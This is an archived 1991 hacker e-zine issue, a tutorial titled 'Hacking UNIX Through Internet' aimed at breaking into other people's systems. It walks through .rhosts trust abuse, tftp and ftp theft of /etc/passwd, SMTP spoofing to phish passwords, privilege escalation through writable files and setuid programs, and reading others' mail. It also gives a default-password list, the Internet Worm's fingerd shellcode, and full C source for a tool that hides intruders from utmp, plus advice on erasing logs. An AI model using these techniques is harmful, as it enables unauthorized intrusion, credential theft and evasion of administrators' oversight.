home *** CD-ROM | disk | FTP | other *** search
/ Hacker Chronicles 1 / HACKER1.ISO / miscpub1 / lol_20.txt < prev    next >
Text File  |  1992-09-26  |  39KB  |  957 lines

  1. ==============================================================================
  2. Volume 2, Issue 01 ---------------------------------- Thursday August 29, 1991
  3. ==============================================================================
  4.    Legions of Lucifer - Phone Hackers United to Crash & Kill  < LoL-Phuck >
  5.                 LoL-Phuck, Inc. /  Issue Number 2.01  08.29.1991
  6.             (C)Copr 1990,91 Cypher Productions - All rights reserved.
  7. ==============================================================================
  8.       Legions of Lucifer founded on January 20, 1990 by: Digitone Cypher
  9.       PHUCK, INC. Founded in 1986 by: Tripin Face  (aka Cobra Commander)
  10. ------------------------------------------------------------------------------
  11. Legions of Lucifer merged with PHUCK, INC on January 15, 1991 at 11:41pm PST!
  12. (That is the same day the Persian Gulf War started [Operation Desert Storm])
  13. We are now: LoL-Phuck
  14. ------------------------------------------------------------------------------
  15. Note:    Any and all information found in this production is not to be used or
  16. intended to  be released to  due any harm to anyone.   This is mearly for 100%
  17. informational purposes only and neither writers, staff members, submitters nor
  18. anyone else that  has anything  to do with this released  issue should be held
  19. resonsible for  the deeds and misgivings that intentional may readers preform.
  20. ------------------------------------------------------------------------------
  21.                     All text file submissions should go to:
  22.                 West Coast Technologies, Inc. @ +1-213-274-1333
  23.            (Use the guest account; User Name: GUEST  Password: GUEST)
  24. ------------------------------------------------------------------------------
  25. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  26. ------------------------------------------------------------------------------
  27. EDITORS/PRESIDENTS NOTE:
  28.   Okay basically, I am proud to say that LoL-Phuck is back from the "DEAD"
  29.   to bring you finally good quality reading material. I am going to tell
  30.   you guys right now, that we will not be producing that many text files,
  31.   we will just release when we feel like it, and not on a monthly kind
  32.   of basis. We are infact looking for writers, so if you do want to apply,
  33.   you can find it in this text file where to. This certain file, is a joint
  34.   release between SHA (a Swedish Hacking Group) and LoL-Phuck, so I hope
  35.   you all like it... I would also, like to note that starting from this
  36.   text file, LoL-Phuck will be totally different, this is the NEW and very
  37.   IMPROVED Legions of Lucifer-Phuck. Watch for the hot text files and
  38.   releases we will be producing in the months to come..
  39.  
  40.   Starting on November 2, 1991 "West Coast Technologies, Inc" will be changing
  41.   area codes from 213 to 310. There will be a 6-Month period from November 2,
  42.   1991 to May 2, 1992, when both the new and the old ways of completing the
  43.   calls to this number (274-1333) will work. Beginning May 2, 1992, calls
  44.   dialed to the incorrect area code (213) will not be completed. You will
  45.   reach a recording explaining the new dialing procedures and you will need to
  46.   re-dial using the correct area code (310).
  47.  
  48.   ...Also, as you all know by now, there is a text file called "LOL-21.TXT"
  49.   which was supposedly written by me, that is like a "Sexual Biography", I
  50.   am going to state for the record that I *DID NOT* write that trash. Now,
  51.   The next official issue will be "LOL-022.TXT" since #21 has been taken by
  52.   the bogus text file, and we wouldn't want them to get confused now would
  53.   we? This kinda of thing has happened before, I believe it was Issue #9,
  54.   some jokers did the same prank, so I know how to handle it. Anyways, I
  55.   would like to thank the rest of you for all your support.
  56.  
  57.                                     Digitone Cypher
  58.                                   LoL-Phuck President
  59.                                        08-29-91
  60.  
  61.   I may be contacted at the following internet addresses:
  62.  
  63.   UUCP: {hplabs!hp-sdd ucsd nosc}!crash!pnet01!dcypher
  64.   ARPA: crash!pnet01!dcypher@nosc.mil
  65.   INET: dcypher@pnet01.cts.com
  66.  
  67.  
  68. ##############################################################################
  69. ----------------------[ Hacking UNIX Through Internet! ]----------------------
  70. ##############################################################################
  71. Written by: Mr Big <SHA>               Release Date: Thursday August 29, 1991
  72. Editied by: Digitone Cypher            Release Numb: 20th Issue
  73. ------------------------------------------------------------------------------
  74.  
  75.  
  76.  
  77.   This file is released in a joint venture with Swedish Hackers Association
  78.   in Sweden.
  79.  
  80.   Note: S.H.A. are not members of LoL-Phuck, nor are LoL-Phuck members
  81.         of S.H.A., both groups are separate to each other, this is a only
  82.         a exchange in knowledge and assistance.
  83.  
  84.   Legions of Lucifer-Phuck is always looking for submissions of text files
  85.   from small groups and from solo writers for worldwide distribution.
  86.   We are also look for Distribution Sites and full/half-time writers. I
  87.   can be contacted at the LoL-Phuck HQ @ 213/274+1333... thank you.
  88.  
  89.  
  90.  
  91.                                ----------------
  92.                                - Introduction -
  93.                                ----------------
  94.  
  95.   I decided to write this file since I feel that there are no complete
  96.   files about hacking unix systems. Many files only cover some small part
  97.   in the art of hacking unix, and they don't cover hacking through
  98.   Internet where aprox. 80% of all hacking takes place. I will not state
  99.   that this file isn't complete either, since I have, on purpose, left out
  100.   many things, i.e. bugs in programs that might be exploited, as the Internet
  101.   Worm did. The reason I did this is because they will not be up-to-date for
  102.   very long, even though some sites don't install all patches that are
  103.   released. A good source for all these bugs are comp.unix.wizard,
  104.   comp.unix.source and other newsgroups.
  105.  
  106.   This file isn't supposed to be for the beginner, so not everything in this
  107.   file is explained in detail. YOU should have common knowledge of unix and
  108.   Internet.
  109.  
  110.  
  111.   /Mr Big - S.H.A.
  112.  
  113.  
  114.  ---------------------------[ Internet Section ]-----------------------------
  115.  
  116.  
  117.                                  ------------
  118.                                  - Internet -
  119.                                  ------------
  120.  
  121.   In the beginning a US Goverment network existed nationwide. When it
  122.   grew larger the network where split into two networks, one research-
  123.   (Arpanet) and one millitary network (Milnet). Later thousands of other
  124.   networks worldwide where also connected and then Internet was born.
  125.  
  126.   Internet is a good way of hacking unix systems. There are more than
  127.   ten thousand computer systems connected to Internet worldwide, running
  128.   diffrent OS's, but Unix's are the major one used. You are also able to reach
  129.   other networks or domains through Internet as ARPA network, NASA or the NSA
  130.   network among others since they are part of the Internet.
  131.  
  132.   Approxitly 80% of all hacking take part on Internet. So be aware of
  133.   that goverment agencies are watching known hacking sites and other sources
  134.   for hackers.
  135.  
  136.   There are also many outdials connected to Internet worldwide that can
  137.   be used for free calls, but this file isn't about that. Maybe I will compile
  138.   my list of outdials some day and release it, but that is in the future.
  139.  
  140.   How do I get connected to Internet? Well, find you local dialup or go
  141.   through some University, since most of them are connected to Internet.
  142.  
  143.   You can use the MIT Dialup if you don't have anything else:
  144.  
  145.             MIT LCS Network Dialup                  (617) 258-7111
  146.  
  147.   (I'm sorry that I can't supply you with a whole list of dialups, but
  148.    since I'm from Sweden, I don't have the needs for US Dialups.)
  149.  
  150.  
  151.   WARNING: Even if Internet seems to be untraceable, they can easily find
  152.            out where you are hacking from. It's a bit harder if you
  153.            use gateways before hacking, and don't use your own account
  154.            unless you want to be in deep shit!
  155.  
  156.  
  157.  
  158.                                    -------
  159.                                    - IRC -
  160.                                    -------
  161.  
  162.   Internet Relay Chat or IRC for short, is a worldwide multi-chat system
  163.   where users can exchange and discuss stuff real-time with the rest of the
  164.   world. IRC has many channels you can use - both public, private and hidden.
  165.   There are many users using this and you can easily get help and information
  166.   this way, since many people out there knows what they are doing.
  167.  
  168.   Be aware that goverment agencies, like NCSA, might be tapping the public
  169.   forums and users using them, atleast I would...
  170.  
  171.   Use this IRC server if you don't have anything else:
  172.  
  173.                bradenville.andrew.cmu.edu             (128.2.54.2)
  174.  
  175.  
  176.  
  177.                                  ------------
  178.                                  - Outdials -
  179.                                  ------------
  180.  
  181.   There are also outdials on Internet that you can use. I will not include
  182.   a list of those, since I know if they are abused, they will go down. You
  183.   have to do your own search for them.
  184.  
  185.  
  186.  
  187.                                   ----------
  188.                                   - Telnet -
  189.                                   ----------
  190.  
  191.   Telnet is more or less equal to Internet. With Telnet you can access other
  192.   systems on the Internet by entering the IP number or the same address of
  193.   the computer.
  194.  
  195.   This is the most common way of connecting to other systems, even if there
  196.   are other ways too... i.e. rlogin among others...
  197.  
  198.   #telnet [HOST] [PORT]
  199.  
  200.   Where HOST is the IP address or the name of the computer, and PORT is the
  201.   port to connect to at the remote site.
  202.  
  203.   The port number range from 0-9999. Ports 0-255 are standard ports and well
  204.   defined in unix. Ports 256-1023 are well known ports. Ports 1024-4999 are
  205.   user defined ports. Ports from 5000 and upward are nondefined ports.
  206.  
  207.   Here are a small list of common port numbers and what they do:
  208.  
  209.   21   FTP           _ File Transfer Protocoll
  210.   25   SMTP          - Or Simple Mail Transfer Protocol.
  211.   79   Finger        - Reports information of users on remote system.
  212.  
  213.  
  214.  
  215.                                    -------
  216.                                    - Ftp -
  217.                                    -------
  218.  
  219.   File Transfer Protocol or FTP for short is a powerful way to send and
  220.   receive files between Internet connected hosts.
  221.  
  222.   Many sites have set up their systems for anonymous ftp. They have done
  223.   this since they want everyone to be able to get files and information
  224.   without having a password. You should respect the ftp hours that are
  225.   common, i.e. do NOT ftp at local business times, since these systems
  226.   are used in companys, and work most of the time, and if you use ftp during
  227.   these hours, they might close the opportunity for us to use ftp, and I
  228.   would hate it if that happend.
  229.  
  230.   #ftp [HOST]
  231.  
  232.   Where HOST are the IP address or the name of the computer.
  233.  
  234.  
  235.  
  236.                                   ----------
  237.                                   - Usenet -
  238.                                   ----------
  239.  
  240.   Some people say that Usenet is the world larges BBS around, and in some
  241.   sense they are right. Usenet consists of over 1000 forums for various
  242.   topics, with hundreds of thosands of users worldwide using it.
  243.  
  244.   Many good forums for Unix information exists, i.e.
  245.  
  246.   misc.security
  247.   comp.unix.vizard
  248.   comp.unix.source
  249.   comp.security.announce
  250.   alt.security
  251.  
  252.   To use Usenet news just type:
  253.  
  254.   #rn                                 <- This command might vary from
  255.                                          system to system.
  256.  
  257.  
  258.  
  259.                                    --------
  260.                                    - CERT -
  261.                                    --------
  262.  
  263.   CERT or Computer Emergency Respons Team is an organization which main
  264.   purpose are to help and prevent unautorized access to computer systems.
  265.   They publish bug fixes for security holes in diffrent OS's, mainly in
  266.   comp.security.announce. They also have their own site and support for
  267.   anonymous ftp so you can directly ftp bug fixes from them or tools that
  268.   helps system administrators to check the security on their own systems.
  269.  
  270.   One good system administration tool for checking the security on your own
  271.   system are COPS, even if it dosen't detect all bugs that exists.
  272.  
  273.   System Managers: If you think you have a compromised system, I suggest that
  274.                    you contact CERT for assistance.
  275.  
  276.   The Internet address for CERT is:
  277.  
  278.                cert.sei.cmu.edu                    (128.237.253.5)
  279.  
  280.  
  281.  
  282.  ------------------------------[ Unix Section ]-------------------------------
  283.  
  284.  
  285.                               --------------------
  286.                               - Attacking target -
  287.                               --------------------
  288.  
  289.   Well... first we need an account on a remote system.. How do we get it?
  290.   There are no easy ways for this, unless your system is trusted.
  291.  
  292.   It isn't easy even if your system is trusted, but it is easier :-)
  293.  
  294.  
  295.                                   - .rhosts -
  296.  
  297.   Check out your own and other users .rhosts files.
  298.   These files contains those machines and users that are trusted to log into
  299.   the account, in which home group it resist, without any password.
  300.  
  301.   Note: You must use rlogin to use this feature.
  302.  
  303.   #cat .rhosts
  304.   albert guest
  305.   gnu.ai.mit.edu +
  306.   #
  307.  
  308.   The plus (+) sign indicates that all users on gnu.ai.mit.edu are trusted to
  309.   use this account without a password, and hopefully this user can log in on
  310.   the same account on gnu.ai.mit.edu whithout a password.
  311.  
  312.   Note: You can set "+ +" to allow anyone anywhere to use the account,
  313.         but be aware of that if the user dosen't have to enter his own
  314.         password, he WILL contact the system administrators at his site.
  315.  
  316.  
  317.   To scan all users .rhosts files use the following:
  318.  
  319.   #find / -name .rhosts -exec /bin/cat {} ";"
  320.  
  321.   If you stumble in on an account, then I suggest you add one entry to
  322.   the .rhosts file to include the hostaddress of a system that allows guest
  323.   users, and a plus sign (+). By doing this you don't have to create a shell
  324.   with suid that can be discovered and you don't even have to hack another
  325.   account to use the one you stumbled on.
  326.  
  327.   Remeber that the user or root must own the .rhosts file on many newer
  328.   systems, i.e. Sun OS 4.x.
  329.  
  330.  
  331.  
  332.                              - /etc/hosts.equiv -
  333.  
  334.    /etc/hosts.equiv contains system wide trusted remote sites.
  335.  
  336.    #cat /etc/hosts.equiv
  337.    albert
  338.    +@gnu.ai.mit.edu
  339.    +
  340.    #
  341.  
  342.    If /etc/hosts.equiv contains a plus sign (+) then all hosts are trusted.
  343.    Many Sun system are deliverd with /etc/hosts.equiv set up this way.
  344.  
  345.  
  346.                                   - finger -
  347.  
  348.   You can also always try to get some accounts on a remote site by using
  349.   "finger @remotesite" and then guessing passwords...
  350.  
  351.   You can even try "finger user@remotesite", where user is a possible user
  352.   on the remote site, i.e. guest to see if they have a guest account.
  353.  
  354.  
  355.                                   - tftp -
  356.  
  357.   Some systems running tftp - Trivial FTP, have a bug allowing you
  358.   to copy files that contain slashes, normaly tftp impose the security
  359.   that the file must be world readable, but since /etc/passwd are
  360.   world readable, try this:
  361.  
  362.   #tftp remotesite
  363.   tftp> get /etc/passwd                         <- Try snatching /etc/passwd
  364.   Recieved 30216 bytes in 32 seconds.
  365.   tftp> quit
  366.   #
  367.  
  368.   Note: Even if you are not physicaly are logged in at the remote host,
  369.         this action is stored in the log files on the remote system.
  370.  
  371.  
  372.                                    - ftp -
  373.  
  374.   Some systems running anonymous ftp and are not correctly setup might
  375.   allow any user to move above their restricted (root) directory, and
  376.   then access all files on the system.
  377.  
  378.   #ftp remotesite
  379.   Connected to remotesite.
  380.   220 remotesite FTP server (Version 5.59 Mon Oct 29 15:33:08 EET 1990) ready.
  381.   Name (remotesite:root): anonymous                <- Login as anonymous
  382.   331 Guest login ok, send your login name as password.
  383.   Password:                                        <- Anything is ok
  384.   230- Guest login ok, access restrictions apply.
  385.   ftp> cdup                                        <- The magic one!
  386.   250 CWD command successful.
  387.   ftp> get /etc/passwd /dev/tty                    <- Retreive /etc/passwd
  388.   200 PORT command successful.
  389.   150 Opening ASCII mode data connection for passwd (56 bytes).
  390.   root:sEQ5aTPgP4bSc:0:0:Super-User:/:/bin/sh
  391.   +::0:0:::
  392.   226 Transfer complete.
  393.   local: /dev/tty remote: passwd
  394.   56 bytes received in 7e-06 seconds (1.1e+04 Kbytes/s)
  395.   ftp> quit
  396.   221 Goodbye.
  397.   #
  398.  
  399.  
  400.                                  - sendmail -
  401.  
  402.   The Internet Worm exploited a debug mode in the original sendmail to
  403.   coax sendmail into creating and executing a program that copied the
  404.   rest of the Internet worm over to the target host.
  405.  
  406.   Note: Almost every system have been patched against this.
  407.  
  408.   #telnet remotesite 25
  409.   Escape character is '^]'.
  410.   220 s350.  Sendmail 4-0/SMI-4-0 ready at Wed, 10 Jan 91 15:35:01
  411.   debug                                          <- Try debug command
  412.   200 Debug set
  413.   quit
  414.   Connection closed by foreign host
  415.   #
  416.  
  417.  
  418.                                    - smtp -
  419.  
  420.   By connection to the smtp daemon on the remote site, you are able to send
  421.   mail under any user identity, to any user on any system.
  422.  
  423.   If we want to try to fool a user on a system to change his password,
  424.   (not likely he will be fooled), but we can easily do this,
  425.   i.e. We want to send mail from root@tycho.ncsc.mil to john@gnu.mit.edu
  426.  
  427.   #telnet tycho.ncsc.mil 25
  428.   Connected to tycho.ncsc.mil.
  429.   Escape character is '^]'.
  430.   220 tycho.ncsc.mil.  Sendmail 4-0/SMI-4-0 ready at Wed, 10 Jan 91 15:35:01
  431.   rcpt to: john@gnu.mit.edu                <- Receiving user
  432.   250 john... Recipient ok
  433.   mail from: root@tycho.ncsc.mil           <- Fake user
  434.   250 example... Sender ok
  435.   data                                     <- Instruct SMTP to receive data
  436.   354 Enter mail, end with "." on a line by itself
  437.  
  438.   We are testing new equipment and you are instructed to change your password
  439.   to john as soon as you receive this message.
  440.  
  441.   root@tycho.ncsc.mil
  442.   .                                        <- End mail
  443.   250 Mail accepted
  444.   quit                                     <- Now disconnect from system
  445.   Connection closed.
  446.   #
  447.  
  448.  
  449.  
  450.                               -------------------
  451.                               - Raise you privs -
  452.                               -------------------
  453.  
  454.   Many users talk about getting root access... It's nice but not necessary
  455.   to have. The Internet worm didn't exploit root privs if it had it and
  456.   it managed to hit many remote sites anyway.
  457.  
  458.   If you need root or not depends on what you want to do with the system.
  459.  
  460.  
  461.                                 - System files -
  462.  
  463.   Check out if you have read/write access to the following files:
  464.  
  465.   #ls -l /dev/mem
  466.   crwxrw-rw-  root  /dev/mem            <- General physical memory
  467.  
  468.   #strings - /dev/mem                   <- Use this to get strings
  469.                                            from memory to use
  470.  
  471.  
  472.   #ls -l /dev/kmem
  473.   crwxrw-rw-  root  /dev/kmem           <- Kernal memory
  474.  
  475.   Kernal memory contains among other things.. psid table - Process ID table.
  476.   I will not support any C program allowing changes to pid's in kernal memory
  477.   since if someone doesn't know how to use it, then the whole system will
  478.   crash! and we don't support that kind of action.
  479.  
  480.  
  481.   #ls -l /etc/inittab                   <- Sys V startup file
  482.   #ls -l /etc/rc*                       <- BSD startup file
  483.   -rw-rw-rw-  root  /etc/inittab
  484.   -rw-rw-rw-  root  /etc/rc             <- Standard unix commands
  485.   -rw-rw-rw-  root  /etc/rc.host        <- running with root privs
  486.   -rw-rw-rw-  root  /etc/rc.local       <- #ex /etc/rc
  487.  
  488.  
  489.   #ls -l /etc/inetd.conf                <- Sys V demon configuration file
  490.   #ls -l /usr/etc/inetd.conf            <- BSD demon configuration file
  491.   -rw-rw-rw-  root  /etc/inetd.conf     <- After editing use #kill -1 initd
  492.   -rw-rw-rw-  root  /usr/etc/inetd.conf <- After editing use #kill -1 initd
  493.  
  494.  
  495.   #ls -l /etc/utmp                      <- Contains only who information
  496.   -rw-rw-rw-  root  /etc/utmp           <- Used to hide your session
  497.                                            or to change your usernamne
  498.                                            Check out the included source
  499.                                            (hide.c) that does this.
  500.                                            You can even read other users mail.
  501.  
  502.  
  503.   #ls -l /usr/spool/cron/crontabs       <- Sys V cron shell scripts
  504.   #ls -l /usr/spool/cron                <- Older unix systems
  505.   -rw-rw-rw-  root   /usr/spool/cron/crontabs
  506.   -rw-rw-rw-  root   /etc/spool/cron
  507.  
  508.   Check also local written system scripts that runs as root and other
  509.   important system files.
  510.  
  511.  
  512.                              - System directorys -
  513.  
  514.   Check to see if you have write privs to any important system directory.
  515.   i.e.
  516.     /etc
  517.     /bin
  518.     /usr/etc
  519.     /usr/bin
  520.     /usr/lib
  521.     ...
  522.  
  523.   To find writeable directories use:
  524.   #find / -type d -perm -2 -print
  525.  
  526.   If you have write priv's to a directory but not to a file in the directory
  527.   you can still copy the file over to another directory, modify it and
  528.   copy it back.
  529.  
  530.   #cp /home/admin/.rhosts /home/mydir/newrhosts
  531.   #ex /home/mydir/newrhosts
  532.   #rm /home/admin/.rhosts
  533.   #mv /home/mydir/newrhosts /home/admin/.rhosts
  534.  
  535.   or
  536.  
  537.   #cat /bin/sh > /home/admin/shell
  538.  
  539.   To find writeable files use:
  540.   #find / -type f -perm -2 -file {} ";"
  541.  
  542.   Try modifying startup files for users,
  543.   i.e.
  544.     .login
  545.     .cshrc
  546.     .profile
  547.     ...
  548.  
  549.   Note: The System Administrators might check to see if these files have
  550.         been changed and then they check them to see if there was a backdoor
  551.         installed or not.
  552.  
  553.  
  554.                                  - UID files -
  555.  
  556.   I neat way of gaining better access is to search for files that
  557.   have the UID bit set and then if they are writeable, copy /bin/sh over
  558.   to the file to gain the privileges of the owner of the file.
  559.  
  560.   #find / -perm -4000 -exec /bin/ls -lad {} ";"
  561.  
  562.  
  563.                                    - mbox -
  564.  
  565.   Reading other peoples mailboxs might give you a clue to their password.
  566.   They might even have posted it to a friend on the system.
  567.  
  568.   Note: Reading other peoples electronic mail is a serious crime.
  569.  
  570.   #find / -name mbox -exec /bin/cat {} ";"
  571.  
  572.  
  573.                                  - fingerd -
  574.  
  575.   The Internet worm exploitet a bug in the old fingerd program. The program
  576.   used an obsolete C function called gets(). gets() copies input into
  577.   a string, but doesn't count the number of characters copied. The old
  578.   fingerd declaired a 512-byte buffer as an automatic variable, which placed
  579.   this buffer on the stack. The Internet worm sent down 536 characters,
  580.   overflowing the buffer, adding some code, and modified the return address,
  581.   so that fingerd executed a Bourne shell instead of returning. This flaw
  582.   was used only for VAX running BSD unix.
  583.  
  584.   VAX assembly-language code used:
  585.  
  586.   nop                          400 nop's
  587.   ...
  588.   pushl $68732f                store '/sh[null]' on stack
  589.   pushl $6e69622f              store '/bin' on stack
  590.   movl  sp,r10                 save stack pointer in r10
  591.   pushl $0                     store 0 on stack (arg 3)
  592.   pushl $0                     store 0 on stack (arg 2)
  593.   pushl r10                    store string adress on stack (arg 1)
  594.   pushl $3                     store argument count on stack
  595.   movl  sp,ap                  set argument pointer to stack
  596.   chmk  $3b                    system call to execve
  597.  
  598.  
  599.  
  600.                             -----------------------
  601.                             - Brute force hacking -
  602.                             ------------------------
  603.  
  604.   You can allways get a copy of /etc/passwd and then run it with a
  605.   unix matcher guessing passwords. There are many programs around,
  606.   so I think I'm wasting my time if I include one. This is the standard way
  607.   of getting other accounts.. but it's hard to match root account password.
  608.   If you wan't root access you have to use some other technique,
  609.   but if you are satisfied with some user accounts, this is the best way.
  610.  
  611.   Be adviced that many new systems have passwords from 6-8 characters with
  612.   a minimum of one non-alphabetical character, or they are running C2
  613.   standard with shadow /etc/passwd, i.e. you can only see account names
  614.   in /etc/passwd and not the encrypted password, i.e.
  615.  
  616.   #cat /etc/passwd                                 <- Featuring C2 standard
  617.  
  618.   root:*:0:0:Super-User:/:/bin/sh                  <- You can see that they
  619.   guest:*:3169:30:Guest User:/home/guest:/bin/rsh  <- Have shadowing passwd
  620.   +::0:0:::                                           file since the password
  621.                                                       field contains '*'.
  622.  
  623.  
  624.   You can always try to get accounts without password:
  625.  
  626.   #grep :: /etc/passwd
  627.  
  628.   Note: Many system administrators will have their eyes open for users who
  629.         use A LOT of cpu time... so I suggest that you get yourself a password
  630.         cracker for your own computer at home, and run your matching sessions
  631.         there, even if it's slower.
  632.  
  633.  
  634.  
  635.                                   ----------
  636.                                   - Hiding -
  637.                                   ----------
  638.  
  639.   Since hacking is illegal you might want to hide from the System Manager
  640.   at the site you are attacking. Please note that they often pay special
  641.   attention to users using a big per cent of the cpu time (like when matching
  642.   passwords). Also try to keep the number of files in your directory low,
  643.   or atleast try to only store smaller files, anything to not draw
  644.   attention to you.
  645.  
  646.   Change users frequently so if the system managers notice you they hopefully
  647.   do not get any evidence against you.
  648.  
  649.   Check system files to see if they have been patch audit your access to them.
  650.  
  651.  
  652.  
  653.                                  - /etc/utmp -
  654.  
  655.   If you have write permissions to /etc/utmp you can easily remove
  656.   yourself to show up on "who" listings, or even change your username.
  657.  
  658.   Check out the included C source for this, Hide.c.
  659.  
  660.   You can also read other users mail if you can alter /etc/utmp.
  661.  
  662.  
  663.                                    - getty -
  664.  
  665.   Try running /etc/getty or /usr/etc/getty and login again.
  666.  
  667.   With this way you will hide from where you are calling from, i.e. your host
  668.   address won't show up on "who" listnings.
  669.  
  670.  
  671.                               - running programs -
  672.  
  673.   If you use any program that you shouldn't i.e. running passsword
  674.   matching programs, then I suggest that you first rename the program to some
  675.   appropiate, i.e.
  676.  
  677.   #mv matcher emacs
  678.   #mv passwd user
  679.   #mv password magazine
  680.  
  681.   Then use the program:
  682.  
  683.   #emacs user magazine
  684.  
  685.   Or you simply change your source code to always use one file as the passwd
  686.   file and another one for the dictionary.
  687.  
  688.  
  689.                               - /usr/spool/mail/ -
  690.  
  691.   There are times when you should edit users mail. If you are editing a file
  692.   and then kill the process, it will post mail to your user stating that
  693.   the process was aborted and that you can recover your file with a command.
  694.   If the real user sees this, he might talk to the system administrators
  695.   about it, and then they will start to investigate the account without
  696.   your knowledge, and some day.... shit happends!
  697.  
  698.  
  699.                                  - /etc/wtmp -
  700.  
  701.   If you have root access you might want to remove your trails from the
  702.   system log file, /etc/wtmp, so they won't notice that you are fooling
  703.   around with their system.
  704.  
  705.  
  706.  
  707.                                   ----------
  708.                                   - Modems -
  709.                                   ----------
  710.  
  711.   Many people hack just to lower their phonebills. Many unix systems has
  712.   outgoing modem lines. You can use them if you have the right privileges.
  713.  
  714.   Try using the command cu - Call Unix:
  715.  
  716.   #cu 3143818460                                <- Yeah! This number works...
  717.  
  718.  
  719.  
  720.                              ---------------------
  721.                              - Standard accounts -
  722.                              ---------------------
  723.  
  724.   There are many standard accounts you can try hacking and some common too.
  725.   Even if the system administrators are more aware of these holes, they still
  726.   exists, and may be worth trying. Use the included list of standard and
  727.   successful accounts.
  728.  
  729.   Login:          Password:                  Login:          Password:
  730.  
  731.   adm             adm                        admin           admin
  732.   altos           altos                      batch           batch
  733.   bin             bin                        daemon          daemon
  734.   date            date                       demo            demo
  735.   field           service                    games           games
  736.   general         general                    guest           guest
  737.   help            help                       ingres          ingres
  738.   learn           learn                      lp              lp
  739.   lpadmin         lpadmin                    nuucp           nuucp
  740.   pub             pub                        public          public
  741.   rje             rje                        root            root
  742.   standard        standard                   student         student
  743.   sync            sync                       sys             sys
  744.   sysadm          sysadm                     test            test
  745.   time            time                       tty             tty
  746.   unix            unix                       user            user
  747.   uucp            uucp                       uuhost          uuhost
  748.   who             who
  749.  
  750.  
  751.  
  752.                               -------------------
  753.                               - Finding targets -
  754.                               -------------------
  755.  
  756.   This is the hard part if you don't know so much about Internet.
  757.   I will not go further into this, because if everyone starts to use
  758.   the techniques I have, it will be abused and then we might not have many
  759.   systems that will be reachable through Internet. And we don't want
  760.   that to happen, so you have to figure this out for yourself. If this
  761.   sounds a bit on the selfish side, I truely regret it, but its for your
  762.   own good.
  763.  
  764.  
  765.  
  766.                              ---------------------
  767.                              - Crashing a system -
  768.                              ---------------------
  769.  
  770.   If you do crash a system on purpose, I hope you get caught and that
  771.   you have to rot in prison for a long long time...
  772.  
  773.   Even if you stumble in on a root account and think that they are
  774.   lamers who are in charge of the system, you NEVER trash the system
  775.   on purpose!
  776.  
  777.   Never crash a system on purpose!
  778.   Never delete files that you haven't created!
  779.   Never remove personal mail to people on the system!
  780.  
  781.  
  782.  
  783.                             -----------------------
  784.                             - Voice of the Author -
  785.                             -----------------------
  786.  
  787.   I have been working with this for some time now. Even if I don't really
  788.   feel that this is complete, I have desided to release it as it is,
  789.   (then I can write a follow up to this... <grin>), and hopefully you
  790.   will enjoy it anyway.
  791.  
  792.   I will release some Internet/Unix hacking utilities in the near future,
  793.   including backdoors and other nice programs you might need.
  794.  
  795.   If you need to contact me or S.H.A. you can send mail to me on the
  796.   following networks:
  797.  
  798.   FidoNet  : 2:201/610 username mrbig
  799.   Internet : mrbig@DARKSIDE.COM
  800.  
  801.  
  802. #############################################################################
  803.  SOURCE CODE     SOURCE CODE     SOURCE CODE     SOURCE CODE     SOURCE CODE
  804. #############################################################################
  805.  
  806.                                    --------
  807.                                    - Hide -
  808.                                    --------
  809.  
  810.  
  811.   Speacial thanx to Nimh of Stealth Hackers who wrote this program and for
  812.   letting me include it in this release. Thanx!
  813.  
  814.   Hide will let you remove yourself from /etc/utmp or change the information
  815.   for you in /etc/utmp, i.e. username, host address or tty.
  816.  
  817.   Note: /etc/utmp must be writeable by world.
  818.  
  819.  <----CUT HERE-------CUT HERE-------CUT HERE-------CUT HERE------CUT HERE---->
  820.  
  821.  
  822. #include <stdio.h>
  823. #include <stdlib.h>
  824. #include <utmp.h>
  825. #include <pwd.h>
  826.  
  827. #define UTMPFILE        "/etc/utmp"
  828.  
  829.         FILE    *utmpfile;
  830.         char    *utmp_tmp[10240];
  831.  
  832. main (argc, argv)
  833.         int     argc;
  834.         char    *argv[];
  835. {
  836.  
  837.         struct  utmp    *user_slot;
  838.         struct  passwd  *pwd;
  839.         char    line[10], name[10], host[20];
  840.         int     index;
  841.  
  842.         printf ("Welcome to HIDE !        FORMAT:  hide [-i]\n\n");
  843.         utmpfile = fopen (UTMPFILE, "r+");
  844.         if (utmpfile == NULL)
  845.         {
  846.                 printf ("ERROR while opening utmp file... exiting...\n");
  847.                 exit ();
  848.         }
  849.         index = ttyslot();                                              /* Get this users utmp index */
  850.         index *= sizeof(struct utmp);   /* 36 */
  851.         fseek(utmpfile, index, 0);
  852. /****  Get real UID  ****/
  853.         pwd = getpwuid (getuid());
  854.         if (pwd == NULL)
  855.                 printf ("Who the hell are you???");
  856.         else
  857.         {
  858.         printf ("Real user identity:\n");
  859.         printf ("NAME  %s\n", pwd->pw_name);
  860.         printf (" UID  %d\n", pwd->pw_uid);
  861.         printf (" GID  %d\n\n", pwd->pw_gid);
  862.         }
  863. /****  If ARG1 = "-i" then disappear from utmp  ****/
  864.         if ( (argc>1) && (!strcmp(argv[1], "-i")) )
  865.         {
  866.         index+=8;       /* Rel PNT name */
  867.         fseek(utmpfile, index, 0);
  868.         fwrite ("\000", 8, 1, utmpfile);        /* NO NAME */
  869.         fwrite ("\000", 8, 1, utmpfile);        /* NO HOST */
  870.         fclose(utmpfile);
  871.         printf ("Removed from utmp\n");
  872.         exit();
  873.         }
  874. /****  Change utmp data  ****/
  875.         printf ("Enter new data or return for default:\n");
  876.         fseek(utmpfile, index, 0);      /* Reset file PNT */
  877.         fread(line, 8, 1, utmpfile);    line[8]=NULL;
  878.         fread(name, 8, 1, utmpfile);    name[8]=NULL;
  879.         fread(host, 16, 1, utmpfile);   host[16]=NULL;
  880.         fseek(utmpfile, index, 0);      /* Reset file PNT */
  881.         dinput (" TTY  [%s]%s", line, 8);
  882.         dinput ("NAME  [%s]%s", name, 8);
  883.         dinput ("HOST  [%s]%s", host, 16);
  884.         fclose(utmpfile);
  885. }
  886.  
  887. /* Data input */
  888. dinput (prompt, string, size)
  889.         char    *prompt;
  890.         char    *string;
  891.         int     size;
  892. {
  893.         char    input[80];
  894.         char    *stat;
  895.         char    space[] = "                              ";
  896.  
  897.         space[20-strlen(string)] = '\000';
  898.         printf (prompt, string, space);
  899.         stat = gets (input);
  900.         if (strlen(input) > 0)
  901.                 fwrite (input, size, 1, utmpfile);
  902.         else
  903.                 fseek (utmpfile, size, 1);
  904. }
  905.  
  906.  <----CUT HERE-------CUT HERE-------CUT HERE-------CUT HERE------CUT HERE---->
  907.  
  908.  
